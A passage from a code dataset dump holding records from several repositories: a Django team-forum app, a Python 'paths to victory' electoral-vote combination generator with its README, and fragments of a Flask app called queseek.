models.Post.objects.filter(thread=requested_thread)\n\n\tpaginator = Paginator(posts_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_forum_posts.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'posts_list':posts_list, 'pages':pages, 'requested_team':requested_team, 'requested_forum':requested_forum, 'requested_thread':requested_thread, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_posts_creation(request, team_id, forum_id, thread_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\trequested_thread = models.Thread.objects.get(id=thread_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tpost_creation_form = forms.PostForm(request.POST)\n\t\tif post_creation_form.is_valid():\n\t\t\tnew_post = models.Post.objects.create(thread=requested_thread, creator=logged_in_user, title=request.POST['title'], content=request.POST['content'])\n\t\t\tnew_post.save()\n\t\t\tlogged_in_user.userprofile.increment_posts()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum_posts', args=(requested_team.id, requested_forum.id, requested_thread.id,)))\n\telse:\n\t\tpost_creation_form = forms.PostForm()\n\n\treturn render(request, 'team_forum_posts_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'post_creation_form':post_creation_form, 'requested_team':requested_team, 'requested_forum':requested_forum, 'requested_thread':requested_thread, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})"
},
{
"alpha_fraction": 0.7003391981124878,
"alphanum_fraction": 0.7121051549911499,
"avg_line_length": 26.11206817626953,
"blob_id": "5bdcef002b0b7dcdab7a316a2d209363a3183d5e",
"content_id": "ad568466e4b06270aa3ecb5c4e3796cebe9e0bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9434,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 348,
"path": "/lfg_app/models.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom datetime import datetime\nfrom django.template import defaultfilters\n\n\n\ndef usr_img_destination(instance, filename):\n\tdestination = 'user_images/%s/%s' % (instance.user.username, filename)\n\treturn destination\n\n\ndef team_img_destination(instance, filename):\n\tdestination = 'team_images/%s/%s' % (instance.name, filename)\n\treturn destination\n\n\nclass UserProfile(models.Model):\n\tuser = models.OneToOneField(User)\n\timage = models.ImageField(upload_to=usr_img_destination, default=\"default_images/default_user_img.png\")\n\tbirthday = models.DateField(blank=True, null=True)\n\tcountry = models.CharField(max_length=100, blank=True)\n\tcity = models.CharField(max_length=100, blank=True)\n\taddress = models.CharField(max_length=200, blank=True)\n\tabout_me = models.TextField(max_length=1000, blank=True)\n\tposts = models.IntegerField(default=0)\t\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.user)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('user_overview', kwargs={'user_id':self.user.id})\n\t\t\n\tdef increment_posts(self):\n\t\tself.posts += 1\n\t\tself.save()\n\n\nclass Category(models.Model):\n\tcategory = models.CharField(max_length=100)\n\n\tclass Meta:\n\t\tverbose_name = 'Category'\n\t\tverbose_name_plural = 'Categories'\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.category)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('search_subcategory', kwargs={'category_id':self.id})\n\nclass SubCategory(models.Model):\n\tcategory = models.ForeignKey(Category)\n\tsubcategory = models.CharField(max_length=100)\n\n\tclass Meta:\n\t\tverbose_name = 'Subcategory'\n\t\tverbose_name_plural = 'Subcategories'\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.subcategory)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('search_teams_in_cat', kwargs={'category_id':self.category.id, 'subcategory':self.id})\n\n\nclass TeamProfile(models.Model):\n\tname = models.CharField(max_length=256)\n\timage = models.ImageField(upload_to=team_img_destination, default=\"default_images/default_team_img.jpg\")\n\tcategory = models.ForeignKey(SubCategory)\n\tdescription = models.TextField(max_length=1000)\n\tcountry = models.CharField(max_length=60, blank=True)\n\tcity = models.CharField(max_length=60, blank=True)\n\taddress = models.CharField(max_length=200, blank=True)\n\tdate_founded = models.DateTimeField(auto_now_add=True)\n\n\tY = 'Y'\n\tN = 'N'\n\tRECRUITING_CHOICES = (\n\t\t(Y, 'Yes'),\n\t\t(N, 'No'),\n\t)\n\trecruiting = models.CharField(max_length=1, choices=RECRUITING_CHOICES, default=Y)\n\t\n\tdef __unicode__(self):\n\t\treturn unicode(self.name)\n\n\tclass Meta:\n\t\tordering = ['-date_founded']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_overview', kwargs={'team_id':self.id})\n\n\nclass Membership(models.Model):\n\tuser = models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\tjoined_team = models.DateTimeField(auto_now_add=True)\n\n\tLDR = 'LDR'\n\tMOD = 'MOD'\n\tUSR = 'USR'\n\tUSER_TYPE_CHOICES = (\n\t\t(LDR, 'Leader'),\n\t\t(MOD, 'Moderator'),\n\t\t(USR, 'User'),\n\t)\n\tuser_type = models.CharField(max_length=3, choices=USER_TYPE_CHOICES, default=USR)\n\n\tclass Meta:\n\t\tordering = ['user_type', '-joined_team']\n\n\nA = 'A'\nI = 'I'\nINVITATION_CHOICES = (\n\t(A, 'Accepted'),\n\t(I, 'In progress')\n)\n\nclass Invitation(models.Model):\n\tuser = 
models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\taccepted = models.CharField(max_length=1, choices=INVITATION_CHOICES, default=I)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\nclass Friendship(models.Model):\n\tuser = models.ForeignKey(User, related_name='f_user')\n\tfriend = models.ForeignKey(User, related_name='f_friend')\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\taccepted = models.CharField(max_length=1, choices=INVITATION_CHOICES, default=I)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\nclass Message(models.Model):\n\tsender = models.ForeignKey(User, related_name=\"m_sender\")\n\treciever = models.ForeignKey(User, related_name=\"m_reciever\")\n\ttitle = models.CharField(max_length=256)\n\tcontent = models.TextField(max_length=1000)\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\n\tY='Y'\n\tN='N'\n\tREAD_CHOICES=(\n\t\t(Y, 'Y'),\n\t\t(N, 'N'),\n\t)\n\tread = models.CharField(max_length=1, choices=READ_CHOICES, default=N)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('message_read', kwargs={'message_id':self.id})\n\n\tdef read_message(self):\n\t\tself.read = 'Y'\n\t\tself.save()\n\n\nclass Tasks(models.Model):\n\tcreator = models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\ttask = models.CharField(max_length=100)\n\tdescription = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\tdeadline = models.DateTimeField(blank=True, null=True)\n\tdate_finished = models.DateTimeField(blank=True, null=True)\n\n\tH = 'H'\n\tN = 'N'\n\tL = 'L'\n\tPRIORITY_CHOICES = (\n\t\t(H, 'High'),\n\t\t(N, 'Normal'),\n\t\t(L, 'Low'),\n\t)\n\tpriority = models.CharField(max_length=1, choices=PRIORITY_CHOICES, default=N)\n\n\tclass Meta:\n\t\tordering = ['date_finished', '-date_created']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_subtasks', kwargs={'team_id':self.team.id, 'task_id':self.id})\n\n\tdef finish_task(self):\n\t\tself.date_finished = datetime.now()\n\t\tself.save()\n\n\nclass SubTasks(models.Model):\n\ttask = models.ForeignKey(Tasks)\n\tsubtask = models.CharField(max_length=100)\n\tdescription = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\tdeadline = models.DateTimeField(blank=True, null=True)\n\tdate_finished = models.DateTimeField(blank=True, null=True)\n\n\tclass Meta:\n\t\tordering = ['date_finished', 'date_created']\n\n\tdef subtask_list(self):\n\t\tif self.date_finished is None:\n\t\t\treturn u\"%s\\n(%s - In progress)\\n%s\" % (self.subtask, self.date_created, self.description)\n\t\telse:\n\t\t\tfinished = self.date_finished.strftime(\"%D %T\")\n\t\t\treturn u\"%s\\n(%s - %s)\\n%s\" % (self.subtask, self.date_created, finished, self.description)\n\n\tdef finish_subtask(self):\n\t\tself.date_finished = datetime.now()\n\t\tself.save()\n\n\nclass Forum(models.Model):\n\tteam = models.ForeignKey(TeamProfile)\n\ttitle = models.CharField(max_length=100)\n\n\tdef __unicode__(self):\n\t\treturn self.title\n\n\tdef num_posts(self):\n\t\treturn sum([t.num_posts() for t in self.threads.all()])\n\n\tdef last_post(self):\n\t\tthreads = self.threads.all()\n\t\tlast = None\n\t\tfor thread in threads:\n\t\t\tlastp = thread.last_post()\n\t\t\tif lastp and (not last or lastp.date_created > last.date_created):\n\t\t\t\tlast = lastp\n\t\treturn last\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_forum_threads', 
kwargs={'team_id':self.team.id, 'forum_id':self.id})\n\n\nclass Thread(models.Model):\n\tforum = models.ForeignKey(Forum, related_name='threads')\n\tcreator = models.ForeignKey(User)\n\ttitle = models.CharField(max_length=100)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']\n\n\tdef __unicode__(self):\n\t\treturn unicode(\"%s - %s\" % (self.creator, self.title))\n\n\tdef last_post(self): return self.posts.last()\n\tdef num_posts(self): return self.posts.count()\n\tdef num_replies(self): return self.posts.count() - 1\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_forum_posts', kwargs={'team_id':self.forum.team.id, 'forum_id':self.forum.id, 'thread_id':self.id})\n\n\nclass Post(models.Model):\n\tthread = models.ForeignKey(Thread, related_name='posts')\n\tcreator = models.ForeignKey(User)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\ttitle = models.CharField(max_length=60)\n\tcontent = models.TextField(max_length=1000)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\tdef __unicode__(self):\n\t\treturn unicode(\"%s - %s\" % (self.creator, self.title))\n\n\tdef last_post(self):\n\t\treturn u\"%s %s - %s\\n%s\" % (self.creator.first_name, self.creator.last_name, self.title, self.date_created)\n\n\tdef profile_data(self):\n\t\tp = self.creator\n\t\treturn p.userprofile.posts, p.userprofile.image\n\n\tdef display_post(self):\n\t\treturn u\"%s %s - %s (%s)\\n%s\" % (self.creator.first_name, self.creator.last_name, self.title, self.date_created, self.content)\n\nONE = 1\nTWO = 2\nTHREE = 3\nFOUR = 4\nFIVE = 5\nSIX = 6\nSEVEN = 7\nEIGHT = 8\nNINE = 9\nTEN = 10\nRATING_CHOICES = (\n\t(ONE, '1'),\n\t(TWO, '2'),\n\t(THREE, '3'),\n\t(FOUR, '4'),\n\t(FIVE, '5'),\n\t(SIX, '6'),\n\t(SEVEN, '7'),\n\t(EIGHT, '8'),\n\t(NINE, '9'),\n\t(TEN, '10'),\n)\n\nclass UserReview(models.Model):\n\tuser = models.ForeignKey(User, related_name='user_reviewed')\n\treviewed_by = models.ForeignKey(User, related_name='reviewer')\n\trating = models.IntegerField(choices=RATING_CHOICES, default=ONE)\n\tcontent = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\nclass TeamReview(models.Model):\n\tteam = models.ForeignKey(TeamProfile)\n\treviewed_by = models.ForeignKey(User)\n\trating = models.IntegerField(choices=RATING_CHOICES, default=ONE)\n\tcontent = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\nclass UserStatus(models.Model):\n\tuser = models.ForeignKey(User)\n\tcontent = models.TextField(max_length = 500)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']\n\n\nclass TeamStatus(models.Model):\n\tteam = models.ForeignKey(TeamProfile)\n\tcontent = models.TextField(max_length = 500)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']"
},
{
"alpha_fraction": 0.512077271938324,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 16.25,
"blob_id": "e422b9c1599fe63ada6a0d3512973a9f09b3141c",
"content_id": "8af2126f08fc0f1ba828d3550ba69531b83ec650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "Django==1.8.3\nMySQL-python==1.2.5\nPillow==2.9.0\nargparse==1.2.1\ndjango-extensions==1.6.1\ndjango-stdimage==2.0.6\nprogressbar2==2.7.3\npydot==1.0.2\npygraphviz==1.3.1\npyparsing==1.5.7\nsix==1.10.0\nwsgiref==0.1.2\n"
},
{
"alpha_fraction": 0.8222222328186035,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 19.545454025268555,
"blob_id": "2aeef0acd73aa0bc62c45083b3f6ba5a9767e98a",
"content_id": "ff127e8117ca12a7220b61402c56ea31dc3c887e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/lfg_app/admin.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Category, SubCategory\n\n\[email protected](Category)\nclass CategoryAdmin(admin.ModelAdmin):\n\tpass\n\[email protected](SubCategory)\nclass SubCategoryAdmin(admin.ModelAdmin):\n\tpass"
},
{
"alpha_fraction": 0.5295903086662292,
"alphanum_fraction": 0.5326251983642578,
"avg_line_length": 29,
"blob_id": "7c795856e78ef4bfec37914f6dd17836b6bf5f70",
"content_id": "daa7b9ceca3db6fae4055eddf9500d6482580d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 22,
"path": "/lfg_app/templates/lfg_app/team_forum.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_team.html\" %}\n\n{% block data %}\n<div class=\"context\">\n {% if logged_in_user == leader.user or logged_in_user in mods.user %}\n <div class=\"interaction\">\n <br>\n <a href=\"{% url 'team_forum_creation' requested_team.id %}\">Create a new subforum</a>\n <br>\n </div>\n {% endif %}\n <div class=\"context_data\">\n <ul>\n {% for result in forum_list %}\n <a class=\"task\" href=\"{{ result.get_absolute_url }}\"><l1 class=\"forum_thread\">{{ result.title|title }}</l1></a>\n {% empty %}\n <li>Create new subforums!</li>\n {% endfor %}\n </ul>\n </div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.6572437882423401,
"alphanum_fraction": 0.6643109321594238,
"avg_line_length": 30.55555534362793,
"blob_id": "4e441480bfd4bd80c2fed36533c1aa811bd67294",
"content_id": "40641940bb64e3aaf79f25a041c304e51ebeaf04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 283,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 9,
"path": "/lfg_app/templates/lfg_app/team_creation_success.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n\n{% block data %}\n<div>\n\t<h1>You have successfuly created your team!</h1>\n\t<p>Please update your info in Team management.</p>\n\t<a href=\"{% url 'team_overview' requested_team.id %}\">Click here to go to your new team.</a>\n</div>\n{% endblock data %}"
}
] | 12 |
jeremyjbowers/paths2victory | https://github.com/jeremyjbowers/paths2victory | 66a021a63db5c1261b3cd53a45c7045edd0209a8 | 425173c388b4c40154a3b60855fe576922c15715 | 61b604b559165a24bfd46fd3fe92f89a814da313 | refs/heads/main | 2022-12-20T06:48:41.570603 | 2020-09-21T18:50:33 | 2020-09-21T18:50:33 | 296,954,457 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5414392352104187,
"alphanum_fraction": 0.5533498525619507,
"avg_line_length": 29.545454025268555,
"blob_id": "d04e4fc71be3f9605850a37e1f7dcbcbde9c410a",
"content_id": "814f3155e42feeac9429b38d5948f4f41bae0f35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2015,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 66,
"path": "/p2v.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "from itertools import permutations\n\nimport ujson as json\n\nimport settings\nimport utils\n\ndef direction_test(cand, rating):\n if cand['condition'] == \">\":\n if rating > 0:\n return True\n\n if cand['condition'] == \"<\":\n if rating < 0:\n return True\n\n return False\n\n\nsheet = utils.get_sheet(settings.SHEET_ID, settings.SHEET_RANGE)\n\nfor cand in settings.CANDIDATES:\n states = [{\n \"state\": a['state'],\n \"ev\": int(a['ev']), \n \"pollclose\": a['first_results'],\n \"90pct12hrs\": utils.x_to_bool(a['90pct12hr']), \n \"swing\": utils.x_to_bool(a['swing2']), \n \"rating\": int(a['rating'])\n } for a in sheet]\n\n swing = [a for a in states if a['swing'] == True]\n\n locked_states = [a for a in states if a['swing'] == False and direction_test(cand, a['rating'])]\n\n cand_evs = sum([a['ev'] for a in locked_states])\n\n paths = utils.elect_paths(swing, 270 - cand_evs)\n\n unique_paths = set([])\n\n for path in paths:\n path_evs = sum([p['ev'] for p in path]) + cand_evs\n states = sorted([f\"{p['state']} ({p['ev']})\" for p in path], key=lambda x: x[0])\n state_string = \", \".join(states)\n state_string = f\"{path_evs}: {state_string}\"\n unique_paths.add(state_string)\n\n parsed_paths = []\n\n for a in unique_paths:\n path_dict = {\n \"evs\": int(a.split(': ')[0]),\n \"states\": [{\"state\": z.split(\" (\")[0], \"ev\": int(z.split(\" (\")[1].replace(\")\", \"\"))} for z in a.split(\": \")[1].split(\", \")],\n \"state_string\": a.split(\": \")[1]\n }\n path_dict['num_states'] = len(path_dict['states'])\n if path_dict['evs'] < 300:\n parsed_paths.append(path_dict)\n\n sorted_paths = sorted(parsed_paths, key=lambda x: x['num_states'])\n\n print(f\"{cand['name']} has {cand_evs} locked-in EVs and {len(sorted_paths)} paths to victory\")\n\n with open(f'{cand[\"slug\"]}_paths.json', 'w') as writefile:\n writefile.write(json.dumps(sorted_paths, indent=4))"
},
{
"alpha_fraction": 0.6507436037063599,
"alphanum_fraction": 0.6813880205154419,
"avg_line_length": 29.83333396911621,
"blob_id": "47dfa7cc67d44b8c4745ddf3912a282811e3a7c0",
"content_id": "a9ad66708a9f14e29014f54fe5937700888b46c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2219,
"license_type": "permissive",
"max_line_length": 337,
"num_lines": 72,
"path": "/README.md",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "# Paths 2 Victory\n\nInspired by [this lovely Mike Bostock project](https://source.opennews.org/articles/nyts-512-paths-white-house/) and [this lovely NPR Viz project](http://blog.apps.npr.org/2012/11/13/election-2012-generating-the-combinations.html), this is a simple \"paths to victory\" generator for an arbitrary set of candidates in an electoral contest.\n\n## Getting started\n\n1. Start a Google sheet with your race ratings. Here's what we expect as headers:\n```\nstate\tfirst_results\tev\tswing\tswing2\t90pct12hr rating\n```\n* `state`: string, a state abbreviation\n* `first_results`: string, a parseable timestamp for a time when first results could be announced\n* `ev`: int, a number of electoral votes\n* `swing`: boolean, is this in a group of swing states?\n* `swing2`: boolean, is this in an expanded group of swing states?\n* `90pct12hr`: boolean, do we expect a large percentage of the total vote within 12 hours of poll closing?\n* `rating`: int, range 3 to -3 where 3 is locked Democratic and -3 is locked Republican and 0 is a swing state\n\n2. Export some environment variables. You need `SHEET_ID` to correspond to the ID of your Google sheet and `SHEET_RANGE` to correspond to the range of cells you'd like to capture for use.\n\n3. Save your Google auth credentials as a JSON file. [This is a pretty good explainer.](https://cloud.google.com/docs/authentication/getting-started) Save the resulting file as `credentials.json` (it's gitignored) and make sure it's in the root of this project.\n\n## Usage\n```sh\nmkvirtualenv p2v\ngit clone [email protected]:jeremyjbowers/paths2victory.git\ncd paths2victory\npip install -r requirements.txt\np2v.py\n```\n\nThis produces a JSON file for each of the candidates listed in `settings.CANDIDATES` using their `slug` as the namespace for the file.\n\n### Sample output\n```json\n[\n {\n \"evs\": 271,\n \"states\": [\n {\n \"state\": \"FL\",\n \"ev\": 29\n },\n {\n \"state\": \"PA\",\n \"ev\": 20\n }\n ],\n \"state_string\": \"FL (29), PA (20)\",\n \"num_states\": 2\n },\n {\n \"evs\": 283,\n \"states\": [\n {\n \"state\": \"FL\",\n \"ev\": 29\n },\n {\n \"state\": \"GA\",\n \"ev\": 16\n },\n {\n \"state\": \"MI\",\n \"ev\": 16\n }\n ],\n \"state_string\": \"FL (29), GA (16), MI (16)\",\n \"num_states\": 3\n }\n]\n```"
},
{
"alpha_fraction": 0.6391571760177612,
"alphanum_fraction": 0.6444249153137207,
"avg_line_length": 26.80487823486328,
"blob_id": "9eb163c2476a686673d7c63017f79c99ca450862",
"content_id": "659eaad7f7363446d6bdee4865802c2c171cf8a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 41,
"path": "/utils.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "import pickle\nimport os.path\n\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\n\ndef get_sheet(sheet_id, sheet_range):\n SCOPES = [\"https://www.googleapis.com/auth/spreadsheets.readonly\"]\n\n creds = service_account.Credentials.from_service_account_file(\n \"credentials.json\", scopes=SCOPES\n )\n service = build(\"sheets\", \"v4\", credentials=creds)\n sheet = service.spreadsheets()\n\n result = sheet.values().get(spreadsheetId=sheet_id, range=sheet_range).execute()\n values = result.get(\"values\", None)\n\n if values:\n return [dict(zip(values[0], r)) for r in values[1:]]\n return []\n\n\ndef x_to_bool(possible_bool):\n if isinstance(possible_bool, str):\n if possible_bool.lower() in [\"y\", \"yes\", \"t\", \"true\", \"x\"]:\n return True\n return False\n\n\ndef elect_paths(states, target, paths=[], paths_sum=0):\n if paths_sum == target:\n yield paths\n\n if paths_sum >= target:\n yield paths\n\n for i, n in enumerate(states):\n remaining = states[i + 1:]\n yield from elect_paths(remaining, target, paths + [n], paths_sum + n['ev'])"
},
{
"alpha_fraction": 0.5042492747306824,
"alphanum_fraction": 0.7082152962684631,
"avg_line_length": 17.578947067260742,
"blob_id": "5556a038d90f86adab6b0d71b0e4a79262c5775c",
"content_id": "2330def27d99612bc566ce7c6d80d693eba1fbc0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 19,
"path": "/requirements.txt",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "cachetools==4.1.1\ncertifi==2020.6.20\nchardet==3.0.4\ngoogle-api-python-client==1.7.11\ngoogle-auth==1.11.2\ngoogle-auth-httplib2==0.0.3\ngoogle-auth-oauthlib==0.4.1\nhttplib2==0.18.1\nidna==2.10\noauthlib==3.1.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\nrequests==2.24.0\nrequests-oauthlib==1.3.0\nrsa==4.0\nsix==1.15.0\nujson==3.2.0\nuritemplate==3.0.1\nurllib3==1.25.10\n"
},
{
"alpha_fraction": 0.569037675857544,
"alphanum_fraction": 0.569037675857544,
"avg_line_length": 25.66666603088379,
"blob_id": "38d86e10f3c1a8e14e9b035346d2175d3de912ab",
"content_id": "3165fdb3c62f6a9be5c602dbe9553aa7a0648a99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 9,
"path": "/settings.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "import os\n\nSHEET_ID = os.environ.get('SHEET_ID', None)\nSHEET_RANGE = os.environ.get('SHEET_RANGE', None)\n\nCANDIDATES = [\n {\"name\": \"Joe Biden\", \"slug\": \"biden\", \"condition\": \">\"},\n {\"name\": \"Donald Trump\", \"slug\": \"trump\", \"condition\": \"<\"}\n]"
}
] | 5 |
moudNM/queseek | https://github.com/moudNM/queseek | 4fc4eb1e755607dc42b7bc33b71116bce315e279 | 99e4c79f691ff52c62360f953ef7b0033a5d3f72 | c161e79886b7ee1bc15d13924809fda26cd371ff | refs/heads/master | 2021-06-20T08:39:44.369490 | 2020-02-04T13:39:15 | 2020-02-04T13:39:15 | 190,750,924 | 0 | 1 | null | 2019-06-07T13:48:25 | 2020-02-04T13:39:23 | 2021-03-20T01:07:57 | Python | [
{
"alpha_fraction": 0.6621052622795105,
"alphanum_fraction": 0.6810526251792908,
"avg_line_length": 24.62162208557129,
"blob_id": "17a395ba0b7c483b1e1c15a413e185b90b0e1f4c",
"content_id": "1ba1d6cb6a8740f617b4fec0a4a75c776ae15b51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 952,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/app/bp_api/controllers.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, jsonify, request\nfrom app import app\n\napi = Blueprint('api', __name__, template_folder='templates')\n\[email protected]('/')\ndef api_index():\n\treturn 'api homepage'\n\[email protected]('/datatable_example')\ndef api_datatable_example():\n\tresponse = {}\n\t\"\"\" \n\t\t1. deliberately left out location, \n\t\t students to make it work,\n\t\t2. make datatable display url as anchor in DT\n\t\"\"\"\n\t\t\n\tevent_a = []\n\tevent_a.append(\"WWCode Singapore's social coding event\")\n\tevent_a.append(\"Mon, 1 october, 6.30pm - 8:20pm\")\n\tevent_a.append(\"http://meetu.ps/e/FcVHX/8qCls/d\")\n\tevent_a.append(\"Robert Sim\")\n\t\n\tevent_b = []\n\tevent_b.append(\"HackerspaceSG Plenum (tentative)\")\n\tevent_b.append(\"Wed, 10 October, 8:00pm – 8:30pm\")\n\tevent_b.append(\"https://hackerspace.sg/plenum/\")\n\tevent_b.append(\"HSG\")\n\t\n\tresponse['data'] = []\n\tresponse['data'].append(event_a)\n\tresponse['data'].append(event_b)\n\t\n\tresponse = jsonify(response)\n\n\treturn response\n\t\n"
},
{
"alpha_fraction": 0.8529411554336548,
"alphanum_fraction": 0.8529411554336548,
"avg_line_length": 33,
"blob_id": "c5ee1b79ccac32b021efe153815518ada6d78bcc",
"content_id": "ce37d42178f0a12bc408bb536226f6199afedf51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 7,
"path": "/app/bp_events/forms.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, IntegerField\nfrom wtforms.widgets import TextArea\nfrom wtforms.validators import DataRequired\n\nclass CreateEvent(FlaskForm):\n\tpass\n"
},
{
"alpha_fraction": 0.6756359934806824,
"alphanum_fraction": 0.6771036982536316,
"avg_line_length": 28.214284896850586,
"blob_id": "6711ce9483fc9deffbd6998e96890dc53719df81",
"content_id": "8535f12b59a8e9bff2a21eddb8d33997b349314d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2044,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 70,
"path": "/app/forms.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
